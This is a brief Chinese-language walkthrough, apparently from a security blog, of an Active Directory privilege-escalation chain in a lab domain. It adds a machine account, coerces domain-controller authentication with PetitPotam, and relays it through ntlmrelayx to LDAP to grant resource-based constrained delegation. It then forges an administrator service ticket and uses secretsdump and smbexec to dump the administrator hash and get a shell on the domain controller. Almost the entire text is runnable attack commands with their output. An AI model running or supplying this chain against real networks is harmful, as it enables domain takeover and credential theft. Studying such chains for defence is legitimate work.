查看主域: netdom query pdc
查看所有的域控制器,包括主域控制器(PDC)和辅域控制器(ADC): nltest /dclist:域名
测试环境
主域控: 192.168.214.200
辅域控: 192.168.214.201
创建机器账户
1
| addcomputer.py -computer-name "relay1" -computer-pass "Aa@123" -dc-ip 192.168.214.200 "ust4.fun/testacc:Cxk@123" -method SAMR -debug
|
1
| [*] Successfully added machine account relay1$ with password Aa@123
|
开启中继监听
1
| python3 ntlmrelayx.py --escalate-user relay1$ --delegate-access -smb2support --remove-mic -t ldap://192.168.214.201 -debug
|
1
| python3 PetitPotam.py -d '' -u '' -p '' 192.168.214.147 192.168.214.200
|
成功提升权限,赋予了relay1$ 对 DC01 的 RBCD
申请票据
1
| python getST.py -spn cifs/DC01.ust4.fun ust4.fun/relay1$:Aa@123 -impersonate administrator -dc-ip 192.168.214.200
|
导入票据获取权限
1
2
| export KRB5CCNAME=administrator.ccache
python secretsdump.py -target-ip 192.168.214.200 -dc-ip 192.168.214.200 -k -no-pass @'dc01.ust4.fun' -just-dc-user administrator
|
1
2
| export KRB5CCNAME=administrator.ccache
python smbexec.py -target-ip 192.168.214.200 -dc-ip 192.168.214.200 -k -no-pass @'dc01.ust4.fun'
|
